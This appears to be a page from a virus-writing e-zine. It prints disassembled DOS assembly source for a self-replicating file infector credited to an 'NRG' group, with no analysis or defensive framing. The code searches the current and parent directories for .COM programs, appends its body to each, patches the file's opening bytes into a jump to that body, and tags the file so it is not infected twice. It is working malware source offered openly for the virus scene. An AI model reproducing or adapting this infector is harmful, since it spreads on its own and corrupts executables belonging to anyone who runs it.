<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>CRF</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>tof:<br>
jmp short begin<br>
nop ;Reserve 3rd byte<br>
EOFMARK: db 26<br>
<br>
first_four: nop<br>
address: int 20h<br>
check: nop<br>
begin: call nextline<br>
nextline: pop bp<br>
sub bp,offset nextline<br>
<br>
mov byte ptr [bp+offset infected],0<br>
<br>
lea si,[bp+offset first_four]<br>
mov di,offset tof<br>
mov cx,4<br>
cld<br>
rep movsb<br>
<br>
mov ah,1Ah<br>
lea dx,[bp+offset DTA]<br>
int 21h<br>
<br>
mov ah,4Eh<br>
lea dx,[bp+offset filespec]<br>
lea si,[bp+offset filename]<br>
push dx<br>
jmp short continue<br>
<br>
return: mov ah,1ah<br>
mov dx,80h<br>
int 21h<br>
xor ax,ax ;AX= 0<br>
mov bx,ax ;BX= 0<br>
mov cx,ax ;CX= 0<br>
mov dx,ax ;DX= 0<br>
mov si,ax ;SI= 0<br>
mov di,ax ;DI= 0<br>
mov sp,0FFFEh ;SP= 0<br>
mov bp,100h<br>
push bp<br>
mov bp,ax<br>
ret<br>
<br>
nextfile: or bx,bx<br>
jz skipclose<br>
mov ah,3Eh<br>
int 21h<br>
xor bx,bx<br>
skipclose: mov ah,4Fh<br>
<br>
continue: pop dx<br>
push dx<br>
xor cx,cx<br>
xor bx,bx<br>
int 21h<br>
jnc skipjmp<br>
jmp NoneLeft<br>
<br>
skipjmp: mov ax,3D02h<br>
mov dx,si<br>
int 21h<br>
jc nextfile<br>
<br>
mov bx,ax<br>
mov ah,3Fh<br>
mov cx,4<br>
lea dx,[bp+offset first_four]<br>
int 21h<br>
cmp byte ptr [bp+offset check],26<br>
je nextfile<br>
cmp byte ptr [bp+offset first_four],77<br>
je nextfile<br>
mov ax,4202h<br>
xor cx,cx<br>
xor dx,dx<br>
int 21h<br>
<br>
cmp ax,0FD00h<br>
ja nextfile<br>
mov [bp+offset addr],ax<br>
<br>
mov ah,40h<br>
mov cx,4<br>
lea dx,[bp+offset first_four]<br>
int 21h<br>
mov ah,40h<br>
mov cx,offset eof-offset begin<br>
lea dx,[bp+offset begin]<br>
int 21h<br>
<br>
mov ax,4200h<br>
xor cx,cx<br>
xor dx,dx<br>
int 21h<br>
<br>
mov ax,[bp+offset addr]<br>
inc ax<br>
<br>
mov [bp+offset address],ax<br>
mov byte ptr [bp+offset first_four],0E9h<br>
mov byte ptr [bp+offset check],26<br>
<br>
mov ah,40h<br>
mov cx,4<br>
lea dx,[bp+offset first_four]<br>
int 21h<br>
<br>
inc byte ptr [bp+offset infected]<br>
jmp nextfile<br>
<br>
NoneLeft: cmp byte ptr [bp+offset infected],2<br>
jae TheEnd ;The party's over!<br>
<br>
mov di,100h ;DI= 100h<br>
cmp word ptr [di],20CDh<br>
je TheEnd<br>
<br>
lea dx,[bp+offset prevdir]<br>
mov ah,3Bh<br>
int 21h<br>
jc TheEnd<br>
mov ah,4Eh<br>
jmp continue<br>
<br>
TheEnd: jmp return<br>
<br>
filespec: db '*.COM',0<br>
prevdir: db '..',0<br>
<br>
eof:<br>
DTA: db 21 dup (?)<br>
<br>
attribute db ?<br>
file_time db 2 dup (?)<br>
file_date db 2 dup (?)<br>
file_size db 4 dup (?)<br>
filename db 13 dup (?)<br>
<br>
infected db ?<br>
<br>
addr dw ?<br>
<br>
main endp<br>
code ends<br>
<br>
end main</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
